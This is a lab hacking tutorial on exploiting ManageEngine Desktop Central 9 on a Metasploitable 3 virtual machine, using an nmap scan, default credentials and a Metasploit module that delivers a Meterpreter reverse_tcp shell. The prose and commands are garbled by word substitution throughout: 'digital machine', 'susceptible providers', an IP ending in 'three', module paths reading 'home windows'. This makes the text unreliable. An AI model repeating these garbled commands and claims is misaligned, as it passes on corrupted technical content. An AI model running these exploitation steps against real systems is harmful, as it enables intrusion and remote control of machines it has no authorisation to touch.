In the final hacking tutorial we’ve put in the Metasploitable three digital machine on Windows 10 utilizing Virtualbox, Vagrant and Packer. After organising the digital machine with Windows Server 2008 the set up script put in and configured all susceptible providers and functions. One of the susceptible functions is ManageEngine Desktop Central 9. This model of ManageEngine Desktop Central 9 incorporates a number of vulnerabilities that permit us to add information and execute instructions on the goal system. Both vulnerabilities have been patched by the vendor again in 2015. Before we begin exploiting these vulnerabilities let’s take a look at what ManageEngine Desktop Central 9 is used for.
ManageEngine Desktop Central is an built-in desktop and cell gadget administration utility that helps system directors in managing servers, purchasers gadgets and cell gadgets from a central location. The software program consists of performance for patch administration, software program deployment, distant management and plenty of different options to handle IT belongings and configuration. ManageEngine Desktop Central is managed by way of a web utility that’s operating on port 8383 on Metasploitable three.
Exploiting ManageEngine Desktop Central 9
Let’s begin with operating an Nmap service scan on the Metasploitable three goal to get an outline of the providers which might be operating on this machine. Instead of scanning the Nmap 1.000 frequent port vary we will probably be operating the scan on all 65.536 TCP ports by including the -p- flag to the command. Start the scan by operating the next command:
nmap -sV -p- 172.28.128.three
The scan outcomes signifies that the Metasploitable three machines is operating plenty of providers, together with an Apache HTTPD service on port 8020 and port 8383.
Accessing the Desktop Central administration interface
Let’s confirm that Apache is operating the ManageEngine Desktop Central 9 web interface by accessing the next URL from a browser:
When we entry the URL utilizing the browser we’re introduced with a login web page. The login type on the proper aspect of the web page signifies the default credentials. We solely need to press the ‘Sign in’ button as a result of the credentials have been entered within the login for already:
Clicking the ‘Sign in’ button takes us to the Desktop Central 9 administrator web page.
From this level on it ought to be simple to show this new entry degree in a shell on the goal machine. This can often be accomplished by finding identified vulnerabilities or by (mis)utilizing the default performance on this software program. Especially on delicate and have wealthy functions like Desktop Central this shouldn’t be too exhausting. To flip common performance right into a shell we ought to be looking for performance to add information, set up plugin’s, edit system information and the rest that permits us to execute code or instructions on the goal system.
Note: The administration web page will be accessed over the HTTP port 8020 and the HTTPS port 8383
- HTTP Port refers back to the regular port that Desktop Central brokers use to contact the Desktop Central server. The default port quantity is 8020.
- HTTPS Port refers back to the secured port that Desktop Central brokers use to contact the Desktop Central server. The default port quantity is 8383.
Searching for attention-grabbing info
Another necessary step to take at this level is to seek for (delicate) attention-grabbing info on this renewed entry degree. Interesting info is info that may assist us additional within the technique of figuring out vulnerabilities and within the exploitation course of. Examples of attention-grabbing info are the model and construct numbers, credentials, administrator notes, tickets, configuration parameters, system info and something different info that tells us one thing attention-grabbing concerning the goal.
In the header of the administration panel we will discover the model and construct numbers: ManageEngine Desktop Central 9 Build 91084. This is nice info that we will use to seek for identified vulnerabilities for this particular model and construct of Desktop Central 9.
When we search Google for identified vulnerabilities for this model of Desktop Central and exploit code we shortly find yourself on the next web page on the Rapid 7 website:
As we will see the model and construct quantity precisely match the numbers on the administration panel. Let’s run this exploit from Metasploit within the following part.
Exploiting Desktop Central 9 with Metasploit
In the next steps we will probably be getting shell entry on the Metasploitable three machine. Let’s fireplace up Metasploit by operating the next command:
Run the next command on msfconsole to pick the ManageEngine Desktop Central exploit we’ve discovered earlier on the Rapid 7 website:
use exploit/home windows/http/manageengine_connectionid_write
The ‘show options’ command reveals that we’ve to set three required choices:
- RHOST: Target host IP
- RPORT: The port that ManageEngine Desktop Central web interface is operating on.
- TARGETURI: The base path for the ManageEngine Desktop Central web interface.
We’ll preserve the targeturi and rport values default. This requires us to solely set the goal host parameter by operating the next command:
set RHOST 172.28.128.three
Finally we specify the payload and its required fields with the next instructions:
set payload home windows/meterpreter/reverse_tcp
set lhost 172.28.128.four
Finally kind ‘run’ or ‘exploit’ to execute the exploit.
If every little thing went profitable we now have a shell on the Metasploitable three host. From this level we will work on privilege escalation and run put up exploitation strategies. The Metasploitable three machines incorporates many extra vulnerabilities that we’ll exploit in upcoming tutorials.